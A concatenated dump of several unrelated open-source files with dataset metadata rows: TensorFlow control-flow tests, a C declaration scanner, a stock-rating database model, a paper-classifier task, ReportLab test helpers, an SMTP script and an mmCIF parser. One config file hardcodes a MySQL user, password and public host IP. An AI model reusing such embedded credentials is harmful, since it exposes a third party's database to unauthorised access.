# Ensure that v1 and v2 are initialized
self.assertAllClose([0.0], v1_val)
self.assertAllClose([1.0], v2_val)
def testGroupEmpty(self):
op = tf.group()
self.assertEqual(op.type, "NoOp")
self.assertEqual(op.control_inputs, [])
def testMergeShapes(self):
# All inputs unknown.
p1 = tf.placeholder(tf.float32)
p2 = tf.placeholder(tf.float32)
p3 = tf.placeholder(tf.float32)
m, index = control_flow_ops.merge([p1, p2, p3])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with different ranks.
p1 = tf.placeholder(tf.float32, shape=[1, 2])
p2 = tf.placeholder(tf.float32, shape=[1, 2, 3])
m, index = control_flow_ops.merge([p1, p2])
self.assertIs(None, m.get_shape().ndims)
self.assertEqual([], index.get_shape())
# All inputs known with some dimensions different.
p1 = tf.placeholder(tf.float32, shape=[1, 2])
p2 = tf.placeholder(tf.float32, shape=[2, 1])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = tf.placeholder(tf.float32, shape=[1, 2])
p2 = tf.placeholder(tf.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = tf.placeholder(tf.float32, shape=[1, 2])
p2 = tf.placeholder(tf.float32, shape=[2, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
# All inputs known with same dimensions.
p1 = tf.placeholder(tf.float32, shape=[1, 2])
p2 = tf.placeholder(tf.float32, shape=[1, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([1, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = tf.placeholder(tf.float32, shape=[None, 2])
p2 = tf.placeholder(tf.float32, shape=[None, 2])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, 2], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
p1 = tf.placeholder(tf.float32, shape=[None, None])
p2 = tf.placeholder(tf.float32, shape=[None, None])
m, index = control_flow_ops.merge([p1, p2])
self.assertEqual([None, None], m.get_shape().as_list())
self.assertEqual([], index.get_shape())
def testRefSelect(self):
index = tf.placeholder(tf.int32)
# All inputs unknown.
p1 = tf.placeholder(tf.float32)
p2 = tf.placeholder(tf.float32)
p3 = tf.placeholder(tf.float32)
v1 = tf.Variable(p1, validate_shape=False)
v2 = tf.Variable(p2, validate_shape=False)
v3 = tf.Variable(p3, validate_shape=False)
s = control_flow_ops.ref_select(index, [v1, v2, v3])
self.assertIs(None, s.get_shape().ndims)
# All inputs known but different.
v1 = tf.Variable([[1, 2]])
v2 = tf.Variable([[2], [1]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertIs(None, s.get_shape().ndims)
# All inputs known and same.
v1 = tf.Variable([[1, 2]])
v2 = tf.Variable([[1, 2]])
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual([1, 2], s.get_shape())
# Possibly the same but not guaranteed.
v1 = tf.Variable([[1., 2.]])
p2 = tf.placeholder(tf.float32, shape=[None, 2])
v2 = tf.Variable(p2, validate_shape=False)
s = control_flow_ops.ref_select(index, [v1, v2])
self.assertEqual(None, s.get_shape())
def testRunLoopTensor(self):
with self.test_session() as sess:
tensor_list = []
def condition(t):
return t < tf.constant(5)
def body(_):
tensor_list.append(tf.constant(5))
return tf.constant(10)
result = tf.while_loop(condition, body, [tf.constant(4)])
self.assertEqual(10, sess.run(result))
# Ensure that we cannot run a tensor that escapes the loop body
# accidentally.
with self.assertRaises(ValueError):
sess.run(tensor_list[0])
class TupleTest(tf.test.TestCase):
def testTensors(self):
for v1_first in [True, False]:
with self.test_session():
v1 = tf.Variable([1.0])
add1 = tf.add(
control_flow_ops.with_dependencies([v1.initializer], v1.ref()),
2.0)
v2 = tf.Variable([10.0])
add2 = tf.add(
control_flow_ops.with_dependencies([v2.initializer], v2.ref()),
20.0)
t1, _, t2 = control_flow_ops.tuple([add1, None, add2])
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting t1 initializes v2.
self.assertAllClose([3.0], t1.eval())
self.assertAllClose([10.0], v2.eval())
else:
# Getting t2 initializes v1.
self.assertAllClose([30.0], t2.eval())
self.assertAllClose([1.0], v1.eval())
def testIndexedSlices(self):
for v1_first in [True, False]:
with self.test_session():
v1 = tf.Variable(
np.array([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]]).astype(
np.float32))
v1_at_1 = tf.IndexedSlices(
control_flow_ops.with_dependencies([v1.initializer], v1.ref()),
tf.constant([1]))
v2 = tf.Variable(
np.array([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]]).astype(
np.float32))
v2_at_1 = tf.IndexedSlices(
control_flow_ops.with_dependencies([v2.initializer], v2.ref()),
tf.constant([1]))
st1, st2 = control_flow_ops.tuple([v1_at_1, v2_at_1])
g1 = tf.gather(st1.values, st1.indices)
g2 = tf.gather(st2.values, st2.indices)
# v1 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v1.eval()
# v2 is not initialized.
with self.assertRaisesOpError("Attempting to use uninitialized value"):
v2.eval()
if v1_first:
# Getting g1 initializes v2.
self.assertAllClose([[10.0, 11.0]], g1.eval())
self.assertAllClose([[0.1, 1.1], [10.1, 11.1], [20.1, 21.1]],
v2.eval())
else:
# Getting g2 initializes v1.
self.assertAllClose([[10.1, 11.1]], g2.eval())
self.assertAllClose([[0.0, 1.0], [10.0, 11.0], [20.0, 21.0]],
v1.eval())
def testAcceptTensorsAsControlInputs(self):
with self.test_session():
var = tf.Variable(0)
assign = tf.assign(var, 1)
t, = tf.tuple([tf.constant(0)], control_inputs=[assign])
# Should trigger the assign.
t.eval()
self.assertEquals(1, var.eval())
def testWhilePyFuncBasic(self):
def func(x):
return np.square(x)
with self.test_session():
r = tf.while_loop(
lambda i, v: i < 4,
lambda i, v: [i + 1, tf.py_func(func, [v], [tf.float32])[0]],
[tf.constant(0), tf.constant(2.0, tf.float32)])
self.assertEqual(r[1].eval(), 65536.0)
def testWhileFuncBasic(self):
@function.Defun(tf.float32)
def func(x):
return tf.square(tf.square(x))
with self.test_session():
x = tf.constant(2.0, tf.float32)
r = tf.while_loop(
lambda i, v: i < 2,
lambda i, v: [i + 1, func(v)],
[tf.constant(0), x])
self.assertEqual(r[1].eval(), 65536.0)
r = tf.gradients(r, x)[0]
self.assertEqual(r.eval(), 524288.0)
self.assertEqual(len([op for op in x.graph.get_operations()
if op.type == "Stack"]),
1)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | 7,064,295,795,435,686,000 | 32.60181 | 80 | 0.57536 | false |
gamesun/MyCdecl | main.py | 1 | 5018 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# Copyright (c) 2013, gamesun
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of gamesun nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY GAMESUN "AS IS" AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL GAMESUN BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import wx
import os
import re
QUALIFIER = ("const", "volatile", "signed", "unsigned")
BASICTYPE = ("void", "char", "short", "int", "long",
"float", "double", "struct", "enum", "union")
regex_matchEnum = re.compile(r'enum[\s\S]*?\{[\s\S]*?\}\s(?P<enum>\w+)')
regex_matchUnion = re.compile(r'union[\s\S]*?\{(?:[^{}]|\{[^{}]*\})*\}\s(?P<enum>\w+)')
regex_matchStruct = re.compile(r'struct[\s\S]*?\{[\s\S]*?\}\s(?P<enum>\w+)')
regex_matchType = re.compile(r'typedef\s.*?(?P<type>\w+);')
class MyApp(wx.App):
def OnInit(self):
path = os.getcwd()
self.DeclarationAnalysis(path)
return True
def DeclarationAnalysis(self, path):
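        """Scan the C sources under path, printing the declared type names
        and then the variables that use those types."""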
typeDecl = self.FindAllTypeDecl(path)
print typeDecl[0]
print typeDecl[1]
print typeDecl[2]
print typeDecl[3]
print
variableList = self.FindAllVariable(path, typeDecl)
print variableList[0]
print variableList[1]
print variableList[2]
print variableList[3]
def FindAllVariable(self, path, typeDecl):
""" return as []
"""
variableList = [['enum', []],
['union', []],
                        ['struct', []],
['type', []]]
for dirpath, dirnames, filenames in os.walk(path):
for filename in filenames:
extension = os.path.splitext(filename)[1]
if extension == '.h' or extension == '.c':
filepath = os.path.join(dirpath, filename)
f = open(filepath, "rb")
string = f.read()
f.close()
for e in typeDecl[0][1]:
variableList[0][1] += re.findall('%s\s+(\w+);' % e, string)
for u in typeDecl[1][1]:
variableList[1][1] += re.findall('%s\s+(\w+);' % u, string)
for s in typeDecl[2][1]:
variableList[2][1] += re.findall('%s\s+(\w+);' % s, string)
for t in typeDecl[3][1]:
variableList[3][1] += re.findall('%s\s+(\w+);' % t, string)
return variableList
def FindAllTypeDecl(self, path):
""" return as [ (enum,(,,,)),
(union,(,,,)),
(struct,(,,,)),
[type,[,,,]] ] """
result = [['enum', []],
['union', []],
                  ['struct', []],
['type', []]]
for dirpath, dirnames, filenames in os.walk(path):
for filename in filenames:
extension = os.path.splitext(filename)[1]
if extension == '.h' or extension == '.c':
filepath = os.path.join(dirpath, filename)
f = open(filepath, "rb")
string = f.read()
f.close()
result[0][1] += regex_matchEnum.findall(string)
result[1][1] += regex_matchUnion.findall(string)
result[2][1] += regex_matchStruct.findall(string)
result[3][1] += regex_matchType.findall(string)
result[3][1] += BASICTYPE
return result
if __name__ == '__main__':
app = MyApp(0)
app.MainLoop()
| bsd-3-clause | -6,601,908,336,828,603,000 | 38.144 | 100 | 0.535273 | false |
SnowWalkerJ/quantlib | quant/data/wind/tables/asharestockrating.py | 1 | 2127 | from ....common.db.sql import VARCHAR, Numeric as NUMBER, DateTime as DATETIME, Column, BaseModel, CLOB, DATE
VARCHAR2 = VARCHAR
class AShareStockRating(BaseModel):
"""
4.75 中国A股投资评级明细
Attributes
----------
object_id: VARCHAR2(100)
对象ID
s_info_windcode: VARCHAR2(40)
Wind代码
s_est_institute: VARCHAR2(100)
研究机构名称
s_est_ratinganalyst: VARCHAR2(100)
分析师名称
s_est_estnewtime_inst: VARCHAR2(8)
评级日期
s_est_scorerating_inst: NUMBER(20,4)
本次标准评级
s_est_prescorerating_inst: NUMBER(20,4)
前次标准评级
s_est_lowprice_inst: NUMBER(20,4)
本次最低目标价
s_est_highprice_inst: NUMBER(20,4)
本次最高目标价
s_est_prelowprice_inst: NUMBER(20,4)
前次最低目标价
s_est_prehighprice_inst: NUMBER(20,4)
前次最高目标价
ann_dt: VARCHAR2(8)
公告日期(内部) 记录了盈利预测信息到达万得平台的时间, 该字段精确到”日”, 未保存具体的时点。
s_est_rating_inst: VARCHAR(20)
本次评级
s_est_prerating_inst: VARCHAR(20)
前次评级
opdate: DATETIME
opdate
opmode: VARCHAR(1)
opmode
"""
__tablename__ = "AShareStockRating"
object_id = Column(VARCHAR2(100), primary_key=True)
s_info_windcode = Column(VARCHAR2(40))
s_est_institute = Column(VARCHAR2(100))
s_est_ratinganalyst = Column(VARCHAR2(100))
s_est_estnewtime_inst = Column(VARCHAR2(8))
s_est_scorerating_inst = Column(NUMBER(20,4))
s_est_prescorerating_inst = Column(NUMBER(20,4))
s_est_lowprice_inst = Column(NUMBER(20,4))
s_est_highprice_inst = Column(NUMBER(20,4))
s_est_prelowprice_inst = Column(NUMBER(20,4))
s_est_prehighprice_inst = Column(NUMBER(20,4))
ann_dt = Column(VARCHAR2(8))
s_est_rating_inst = Column(VARCHAR(20))
s_est_prerating_inst = Column(VARCHAR(20))
opdate = Column(DATETIME)
opmode = Column(VARCHAR(1))
| gpl-3.0 | 3,560,199,213,089,072,600 | 29.5 | 109 | 0.619249 | false |
nikpap/inspire-next | inspirehep/modules/workflows/tasks/classifier.py | 1 | 4238 | # -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2015 CERN.
#
# INSPIRE is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Set of tasks for classification."""
from functools import wraps
from ..proxies import antihep_keywords
def filter_core_keywords(obj, eng):
"""Filter core keywords."""
result = obj.extra_data.get('classifier_results').get("complete_output")
if result is None:
return
filtered_core_keywords = {}
for core_keyword, times_counted in result.get("Core keywords").items():
if core_keyword not in antihep_keywords:
filtered_core_keywords[core_keyword] = times_counted
result["Filtered Core keywords"] = filtered_core_keywords
obj.extra_data['classifier_results']["complete_output"] = result
def classify_paper(taxonomy, rebuild_cache=False, no_cache=False,
output_limit=20, spires=False,
match_mode='full', with_author_keywords=False,
extract_acronyms=False, only_core_tags=False,
fast_mode=False):
"""Extract keywords from a pdf file or metadata in a OAI harvest."""
@wraps(classify_paper)
def _classify_paper(obj, eng):
from invenio_classifier.errors import ClassifierException
from invenio_classifier import (
get_keywords_from_text,
get_keywords_from_local_file,
)
params = dict(
taxonomy_name=taxonomy,
output_mode='dict',
output_limit=output_limit,
spires=spires,
match_mode=match_mode,
no_cache=no_cache,
with_author_keywords=with_author_keywords,
rebuild_cache=rebuild_cache,
only_core_tags=only_core_tags,
extract_acronyms=extract_acronyms
)
fast_mode = False
try:
# FIXME: May need to find another canonical way of getting PDF
if "pdf" in obj.extra_data:
result = get_keywords_from_local_file(
obj.extra_data["pdf"], **params
)
else:
data = []
titles = obj.data.get('titles')
if titles:
data.extend([t.get('title', '') for t in titles])
abstracts = obj.data.get('abstracts')
if abstracts:
data.extend([t.get('value', '') for t in abstracts])
if not data:
obj.log.error("No classification done due to missing data.")
return
result = get_keywords_from_text(data, **params)
fast_mode = True
except ClassifierException as e:
obj.log.exception(e)
return
result['complete_output'] = clean_instances_from_data(
result.get("complete_output", {})
)
result["fast_mode"] = fast_mode
# Check if it is not empty output before adding
if any(result.get("complete_output", {}).values()):
obj.extra_data['classifier_results'] = result
return _classify_paper
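# Illustrative wiring (the taxonomy file name and the workflow objects below are
# assumptions, not taken from this module): the factory returns a task that the
# workflow engine later calls with its own (obj, eng) pair.
#
#     classify = classify_paper(taxonomy="HEPont.rdf", output_limit=10, spires=True)
#     ...
#     classify(obj, eng)  # invoked by the workflow engine at runtime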
def clean_instances_from_data(output):
"""Check if specific keys are of InstanceType and replace them with their id."""
from invenio_classifier.reader import KeywordToken
new_output = {}
for output_key in output.keys():
keywords = output[output_key]
for key in keywords:
if isinstance(key, KeywordToken):
keywords[key.id] = keywords.pop(key)
new_output[output_key] = keywords
return new_output
| gpl-2.0 | -5,475,445,670,009,735,000 | 36.504425 | 84 | 0.607834 | false |
zhaozhi406/news | config.py | 1 | 1431 | #-*- coding:utf-8 -*-
import logging.config
IMAGE_SIZES = {
"large": (680,382),
"middle": (720, 0),
"small": (226,150 )
}
IMAGE_SAVE_DIR = "/Users/jiangqiurong/Desktop"
mongodb_conn_string = "mongodb://47.88.194.127:27017/"
mysql_config = {
"user": "zhaozhi",
"password": "zzhao",
"host": "47.88.194.127",
"database": "news_test",
"charset": "utf8"
}
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'format': '%(asctime)s %(levelname)s [%(filename)s %(funcName)s] %(message)s'
},
},
'filters': {
},
'handlers': {
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'file':{
'level': 'DEBUG',
'class': 'logging.handlers.TimedRotatingFileHandler',
'filename':'/tmp/sync_news.log',
'when': 'D',
'backupCount':7,
'formatter': 'simple'
}
},
'loggers': {
'sync_news': {
'handlers': ['file'],
'propagate': True,
'level': 'DEBUG',
},
'sync_news_test': {
'handlers': ['console', 'file'],
'propagate': True,
'level': 'DEBUG',
},
}
}
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("sync_news_test")
| mit | 5,140,971,644,401,568,000 | 22.080645 | 89 | 0.47659 | false |
trosa/forca | reportlab/lib/testutils.py | 1 | 11504 | #Copyright ReportLab Europe Ltd. 2000-2008
#see license.txt for license details
__version__='''$Id: testutils.py 3662 2010-02-09 11:23:58Z rgbecker $'''
__doc__="""Provides support for the test suite.
The test suite as a whole, and individual tests, need to share
certain support functions. We have to put these in here so they
can always be imported, and so that individual tests need to import
nothing more than "reportlab.whatever..."
"""
import sys, os, string, fnmatch, copy, re
from ConfigParser import ConfigParser
import unittest
# Helper functions.
def isWritable(D):
try:
fn = '00DELETE.ME'
f = open(fn, 'w')
f.write('test of writability - can be deleted')
f.close()
if os.path.isfile(fn):
os.remove(fn)
return 1
except:
return 0
_OUTDIR = None
RL_HOME = None
testsFolder = None
def setOutDir(name):
"""Is it a writable file system distro being invoked within
test directory? If so, can write test output here. If not,
it had better go in a temp directory. Only do this once per
process"""
global _OUTDIR, RL_HOME, testsFolder
if _OUTDIR: return _OUTDIR
D = [d[9:] for d in sys.argv if d.startswith('--outdir=')]
if D:
_OUTDIR = D[-1]
try:
os.makedirs(_OUTDIR)
except:
pass
for d in D: sys.argv.remove(d)
else:
assert name=='__main__',"setOutDir should only be called in the main script"
scriptDir=os.path.dirname(sys.argv[0])
if not scriptDir: scriptDir=os.getcwd()
_OUTDIR = scriptDir
if not isWritable(_OUTDIR):
_OUTDIR = get_rl_tempdir('reportlab_test')
import reportlab
RL_HOME=reportlab.__path__[0]
if not os.path.isabs(RL_HOME): RL_HOME=os.path.normpath(os.path.abspath(RL_HOME))
topDir = os.path.dirname(RL_HOME)
testsFolder = os.path.join(topDir,'tests')
if not os.path.isdir(testsFolder):
testsFolder = os.path.join(os.path.dirname(topDir),'tests')
if not os.path.isdir(testsFolder):
if name=='__main__':
scriptDir=os.path.dirname(sys.argv[0])
if not scriptDir: scriptDir=os.getcwd()
testsFolder = os.path.abspath(scriptDir)
else:
testsFolder = None
if testsFolder:
sys.path.insert(0,os.path.dirname(testsFolder))
return _OUTDIR
def outputfile(fn):
"""This works out where to write test output. If running
code in a locked down file system, this will be a
temp directory; otherwise, the output of 'test_foo.py' will
normally be a file called 'test_foo.pdf', next door.
"""
D = setOutDir(__name__)
if fn: D = os.path.join(D,fn)
return D
def printLocation(depth=1):
if sys._getframe(depth).f_locals.get('__name__')=='__main__':
outDir = outputfile('')
if outDir!=_OUTDIR:
print 'Logs and output files written to folder "%s"' % outDir
def makeSuiteForClasses(*classes):
"Return a test suite with tests loaded from provided classes."
suite = unittest.TestSuite()
loader = unittest.TestLoader()
for C in classes:
suite.addTest(loader.loadTestsFromTestCase(C))
return suite
def getCVSEntries(folder, files=1, folders=0):
"""Returns a list of filenames as listed in the CVS/Entries file.
'folder' is the folder that should contain the CVS subfolder.
If there is no such subfolder an empty list is returned.
'files' is a boolean; 1 and 0 means to return files or not.
'folders' is a boolean; 1 and 0 means to return folders or not.
"""
join = os.path.join
split = string.split
# If CVS subfolder doesn't exist return empty list.
try:
f = open(join(folder, 'CVS', 'Entries'))
except IOError:
return []
# Return names of files and/or folders in CVS/Entries files.
allEntries = []
for line in f.readlines():
if folders and line[0] == 'D' \
or files and line[0] != 'D':
entry = split(line, '/')[1]
if entry:
allEntries.append(join(folder, entry))
return allEntries
# Still experimental class extending ConfigParser's behaviour.
class ExtConfigParser(ConfigParser):
"A slightly extended version to return lists of strings."
pat = re.compile('\s*\[.*\]\s*')
def getstringlist(self, section, option):
"Coerce option to a list of strings or return unchanged if that fails."
value = ConfigParser.get(self, section, option)
# This seems to allow for newlines inside values
# of the config file, but be careful!!
val = string.replace(value, '\n', '')
if self.pat.match(val):
return eval(val)
else:
return value
# This class as suggested by /F with an additional hook
# to be able to filter filenames.
class GlobDirectoryWalker:
"A forward iterator that traverses files in a directory tree."
def __init__(self, directory, pattern='*'):
self.index = 0
self.pattern = pattern
directory.replace('/',os.sep)
if os.path.isdir(directory):
self.stack = [directory]
self.files = []
else:
from reportlab.lib.utils import isCompactDistro, __loader__, rl_isdir
if not isCompactDistro() or not __loader__ or not rl_isdir(directory):
raise ValueError('"%s" is not a directory' % directory)
self.directory = directory[len(__loader__.archive)+len(os.sep):]
pfx = self.directory+os.sep
n = len(pfx)
self.files = map(lambda x, n=n: x[n:],filter(lambda x,pfx=pfx: x.startswith(pfx),__loader__._files.keys()))
self.stack = []
def __getitem__(self, index):
while 1:
try:
file = self.files[self.index]
self.index = self.index + 1
except IndexError:
# pop next directory from stack
self.directory = self.stack.pop()
self.files = os.listdir(self.directory)
# now call the hook
self.files = self.filterFiles(self.directory, self.files)
self.index = 0
else:
# got a filename
fullname = os.path.join(self.directory, file)
if os.path.isdir(fullname) and not os.path.islink(fullname):
self.stack.append(fullname)
if fnmatch.fnmatch(file, self.pattern):
return fullname
def filterFiles(self, folder, files):
"Filter hook, overwrite in subclasses as needed."
return files
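# Illustrative iteration (a sketch, not from the original file): because the walker
# implements __getitem__ with increasing indices, a plain for-loop drives it until the
# internal directory stack is exhausted.
#
#     for filename in GlobDirectoryWalker(RL_HOME, '*.py'):
#         print filename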
class RestrictedGlobDirectoryWalker(GlobDirectoryWalker):
"An restricted directory tree iterator."
def __init__(self, directory, pattern='*', ignore=None):
GlobDirectoryWalker.__init__(self, directory, pattern)
if ignore == None:
ignore = []
self.ignoredPatterns = []
if type(ignore) == type([]):
for p in ignore:
self.ignoredPatterns.append(p)
elif type(ignore) == type(''):
self.ignoredPatterns.append(ignore)
def filterFiles(self, folder, files):
"Filters all items from files matching patterns to ignore."
indicesToDelete = []
for i in xrange(len(files)):
f = files[i]
for p in self.ignoredPatterns:
if fnmatch.fnmatch(f, p):
indicesToDelete.append(i)
indicesToDelete.reverse()
for i in indicesToDelete:
del files[i]
return files
class CVSGlobDirectoryWalker(GlobDirectoryWalker):
"An directory tree iterator that checks for CVS data."
def filterFiles(self, folder, files):
"""Filters files not listed in CVS subfolder.
This will look in the CVS subfolder of 'folder' for
a file named 'Entries' and filter all elements from
the 'files' list that are not listed in 'Entries'.
"""
join = os.path.join
cvsFiles = getCVSEntries(folder)
if cvsFiles:
indicesToDelete = []
for i in xrange(len(files)):
f = files[i]
if join(folder, f) not in cvsFiles:
indicesToDelete.append(i)
indicesToDelete.reverse()
for i in indicesToDelete:
del files[i]
return files
# An experimental untested base class with additional 'security'.
class SecureTestCase(unittest.TestCase):
"""Secure testing base class with additional pre- and postconditions.
We try to ensure that each test leaves the environment it has
found unchanged after the test is performed, successful or not.
Currently we restore sys.path and the working directory, but more
of this could be added easily, like removing temporary files or
similar things.
Use this as a base class replacing unittest.TestCase and call
these methods in subclassed versions before doing your own
business!
"""
def setUp(self):
"Remember sys.path and current working directory."
self._initialPath = copy.copy(sys.path)
self._initialWorkDir = os.getcwd()
def tearDown(self):
"Restore previous sys.path and working directory."
sys.path = self._initialPath
os.chdir(self._initialWorkDir)
class NearTestCase(unittest.TestCase):
def assertNear(a,b,accuracy=1e-5):
if isinstance(a,(float,int)):
if abs(a-b)>accuracy:
raise AssertionError("%s not near %s" % (a, b))
else:
for ae,be in zip(a,b):
if abs(ae-be)>accuracy:
raise AssertionError("%s not near %s" % (a, b))
assertNear = staticmethod(assertNear)
class ScriptThatMakesFileTest(unittest.TestCase):
"""Runs a Python script at OS level, expecting it to produce a file.
It CDs to the working directory to run the script."""
def __init__(self, scriptDir, scriptName, outFileName, verbose=0):
self.scriptDir = scriptDir
self.scriptName = scriptName
self.outFileName = outFileName
self.verbose = verbose
# normally, each instance is told which method to run)
unittest.TestCase.__init__(self)
def setUp(self):
self.cwd = os.getcwd()
global testsFolder
scriptDir=self.scriptDir
if not os.path.isabs(scriptDir):
scriptDir=os.path.join(testsFolder,scriptDir)
os.chdir(scriptDir)
assert os.path.isfile(self.scriptName), "Script %s not found!" % self.scriptName
if os.path.isfile(self.outFileName):
os.remove(self.outFileName)
def tearDown(self):
os.chdir(self.cwd)
def runTest(self):
fmt = sys.platform=='win32' and '"%s" %s' or '%s %s'
p = os.popen(fmt % (sys.executable,self.scriptName),'r')
out = p.read()
if self.verbose:
print out
status = p.close()
assert os.path.isfile(self.outFileName), "File %s not created!" % self.outFileName
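# Usage sketch (script name and output file are hypothetical): instances are normally
# appended to a unittest suite so that runTest() executes the script and checks that
# the expected file appears next to it.
#
#     suite = unittest.TestSuite()
#     suite.addTest(ScriptThatMakesFileTest('graphics', 'test_chart.py', 'test_chart.pdf'))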
| gpl-2.0 | 6,965,741,556,274,241,000 | 32.546547 | 119 | 0.59362 | false |
zxqzx/scripts | emailmodule.py | 1 | 1669 | #!/usr/bin/env python3
# Import smtplib for the actual sending function
import smtplib
# Import the email modules we'll need
from email.mime.text import MIMEText
import sys
import argparse
#User Options
globalsender = ""
loginrequired = "no"
server = "localhost"
port = "587"
starttls = "no"
username = "username"
password = "password"
#Main Function
def main(to, sender, subject, message, attachment):
msg = MIMEText(message, 'plain')
if attachment == "html":
msg = MIMEText(message, 'html')
if globalsender != "":
sender = globalsender
msg['Subject'] = subject
msg['To'] = to
msg['From'] = sender
#msg['Content-Type'] = "text/html; charset='utf-8'"
#msg['Mime-Version'] = "1.0"
#msg['Content-Transfer-Encoding'] = "base64"
print(msg)
s = smtplib.SMTP(server + ":" + port)
if starttls == "yes":
s.starttls()
if loginrequired == "yes":
s.login(username, password)
s.send_message(msg)
s.quit()
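# Direct-call sketch (addresses are placeholders; assumes the SMTP settings above point
# at a reachable server):
#
#     main("[email protected]", "[email protected]", "Hello", "Body text", "plain")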
if __name__ == "__main()__":
parser = argparse.ArgumentParser(description='A')
parser.add_argument('-t', '--to', dest='users', nargs = '*',
help='Email address of the receiver.')
parser.add_argument('-s', '--subject', dest = 'subject', nargs = '*',
help = "Subject of the message")
parser.add_argument('-m', '--message', dest = 'message', nargs = '*',
help = "The actual content of the message")
    parser.add_argument('-f', '--sender', dest = 'sender', nargs = '*',
                        help = "Who the message is from")
    args = parser.parse_args()
    to = ", ".join(args.users)
    subject = ' '.join(args.subject)
    message = ' '.join(args.message)
    sender = ' '.join(args.sender)
    main(to, sender, subject, message, "plain")
| mit | -3,210,705,563,425,402,000 | 20.960526 | 70 | 0.627322 | false |
haddocking/disvis | disvis/IO/mmcif.py | 1 | 1979 | from __future__ import print_function
import sys
from collections import OrderedDict
import numpy as np
def parse_cif(infile):
if isinstance(infile, file):
pass
elif isinstance(infile, str):
infile = open(infile)
else:
raise TypeError("Input should either be a file or string.")
atom_site = OrderedDict()
with infile as f:
for line in f:
if line.startswith('_atom_site.'):
words = line.split('.')
atom_site[words[1].strip()] = []
if line.startswith('ATOM'):
words = line.split()
for key, word in zip(atom_site, words):
atom_site[key].append(word)
natoms = len(atom_site['id'])
dtype = [('atom_id', np.int64), ('name', np.str_, 4),
('resn', np.str_, 4), ('chain', np.str_, 2),
('resi', np.int64), ('x', np.float64),
('y', np.float64), ('z', np.float64),
('occupancy', np.float64), ('bfactor', np.float64),
('element', np.str_, 2), ('charge', np.str_, 2),
('model', np.int64),
]
cifdata = np.zeros(natoms, dtype=dtype)
cifdata['atom_id'] = np.asarray(atom_site['id'], dtype=np.int64)
cifdata['name'] = atom_site['label_atom_id']
cifdata['resn'] = atom_site['label_comp_id']
cifdata['chain'] = atom_site['label_asym_id']
cifdata['resi'] = atom_site['label_seq_id']
cifdata['x'] = atom_site['Cartn_x']
cifdata['y'] = atom_site['Cartn_y']
cifdata['z'] = atom_site['Cartn_z']
cifdata['occupancy'] = atom_site['occupancy']
cifdata['bfactor'] = atom_site['B_iso_or_equiv']
    cifdata['element'] = [symbol.title() for symbol in atom_site['type_symbol']]
cifdata['charge'] = atom_site['pdbx_formal_charge']
cifdata['model'] = atom_site['pdbx_PDB_model_num']
return cifdata
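# Working with the returned structured array (illustrative only): individual columns are
# addressed by field name, so coordinates can be stacked and rows filtered, e.g.
#
#     data = parse_cif('model.cif')
#     xyz = np.column_stack((data['x'], data['y'], data['z']))
#     chain_a = data[data['chain'] == 'A']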
if __name__=='__main__':
import sys
infile = sys.argv[1]
data = parse_cif(infile)
| apache-2.0 | 8,828,443,199,216,002,000 | 33.12069 | 68 | 0.54472 | false |
uclouvain/osis | attribution/tests/ddd/domain/test_teacher.py | 1 | 2419 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
